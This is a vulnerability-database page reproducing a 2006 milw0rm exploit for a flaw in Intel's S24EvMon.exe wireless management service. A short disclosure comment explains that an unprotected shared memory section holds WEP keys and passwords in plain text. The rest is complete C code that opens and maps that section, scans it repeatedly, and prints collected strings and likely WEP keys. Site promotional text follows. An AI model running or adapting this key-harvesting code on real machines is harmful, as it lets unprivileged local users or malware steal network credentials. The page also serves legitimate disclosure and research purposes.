Vulners
Lucene search
Intel Wireless Service - 's24evmon.exe' Shared Memory
///////////////////////////////////////////////////////////////////////
//// S24EvMon.exe Intel Wireless Management Service KEY Hunter
//// Rubén Santamarta
//// [email protected]
//// www.reversemode.com
//// 28/04/2006
///////////////////////////////////////////////////////////////////////
/**********************************************************************************************************
* Testing a vuln-finder application that I am developing, I found a flaw within S24EvMon.exe.
* It is a service which is part (at least) of the Intel PROset/Wireless software. This application
* is provided by Intel in order to support intel Wireless Devices based on Spectrum 24 chipsets.
*
* This service uses a shared memory section which is created without the proper security descriptor,
* allowing unprivileged users to perform operations like Delete, Read or Write into the memory. The
* section is named S24EventManagerSharedMemory
*
* This shared memory is used to store ,in plain text, confidential information like WEP Key, Passwords...
*
* The successful exploitation of this vulnerability could allow to any unprivileged user to access
* confidential information,exposing the network. An important mitigating factor is that the
* vulnerability is local, nevertheless some Malware could take advantage of this flaw.
**********************************************************************************************************/
#include <windows.h>
#include <stdio.h>
#define InitializeObjectAttributes( p, n, a, r, s ) { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = r; \
(p)->Attributes = a; \
(p)->ObjectName = n; \
(p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = NULL; \
}
#define InitializeUnicodeStr(p,s) { \
(p)->Length= wcslen(s)*2; \
(p)->MaximumLength = wcslen(s)*2+2; \
(p)->Buffer = s; \
}
typedef struct _SECTION_BASIC_INFORMATION {
ULONG d000;
ULONG SectionAttributes;
LARGE_INTEGER SectionSize;
} SECTION_BASIC_INFORMATION;
typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
UNICODE_STRING *ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;
typedef DWORD (WINAPI* PQUERYSECTION)(HANDLE, DWORD, PVOID,DWORD,DWORD*);
typedef DWORD (WINAPI* POPENSECTION)(HANDLE*, DWORD,OBJECT_ATTRIBUTES* );
VOID ShowError()
{
LPVOID lpMsgBuf;
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
GetLastError(),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0,
NULL);
MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
exit(1);
}
int main(int argc, char* argv[])
{
OBJECT_ATTRIBUTES SectionAttributes;
SECTION_BASIC_INFORMATION buff;
PQUERYSECTION NtQuerySection;
POPENSECTION NtOpenSection;
char * sMap,cString[256];
UNICODE_STRING uStr;
LPVOID lpMapAddress;
DWORD i,b=0,c=0;
HANDLE hSection;
NtOpenSection = (POPENSECTION) GetProcAddress( LoadLibrary( "ntdll.dll" ),
"NtOpenSection" );
NtQuerySection = (PQUERYSECTION) GetProcAddress( LoadLibrary( "ntdll.dll"),
"NtQuerySection" );
InitializeUnicodeStr(&uStr,L"\\BaseNamedObjects\\S24EventManagerSharedMemory");
InitializeObjectAttributes(&SectionAttributes, &uStr,NULL, NULL, NULL );
NtOpenSection( &hSection, SECTION_MAP_READ|SECTION_QUERY, &SectionAttributes );
if (hSection == NULL) ShowError();
printf("Section opened successfully.\n");
lpMapAddress = MapViewOfFile(hSection, FILE_MAP_READ, 0, 0, 0);
if (lpMapAddress == NULL) ShowError();
if (NtQuerySection(hSection,0,&buff,sizeof(buff),0)) ShowError();
sMap= ( char* )lpMapAddress;
printf("Scanning section...\n\n");
while(c<100)
{
c++;
printf("\nSNAPSHOT ID[%d]----------------[BEGIN]\n\n",c);
for (i=0; i< buff.SectionSize.QuadPart; i++)
{
if( sMap[i]> 0x29 )
{
while( sMap[i] != 0x0 )
{
if( sMap[i]>=0x30 )
{
cString[b] = sMap[i];
b++;
}
i++;
}
cString[b++]='\0';
// less 3 characters should be GARBAGE
if( b>3 && b!=14 && b!=27 ) printf(" String collected: %s\n",cString);
// Alphanumeric WEP KEY (13 characters)
if( b==14 ) printf("### Possible Alphanumeric WEP KEY found: %s\n",cString);
if( b==27 )
{
if(cString[0]!=0x30 && cString[2]!=0x30 && cString[6]!=0x30)
printf("### Possible WEP KEY found(Ascii/HexMode): %s\n",cString);
else
printf(" String collected: %s\n",cString);
}
b=0;
}
}
printf("\nSNAPSHOT ID[%d]----------------[END]\n",c);
Sleep(1000);
}
CloseHandle(hSection);
return 0;
}
// milw0rm.com [2006-05-09]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 May 2006 00:00Current
7.4High risk
Vulners AI Score7.4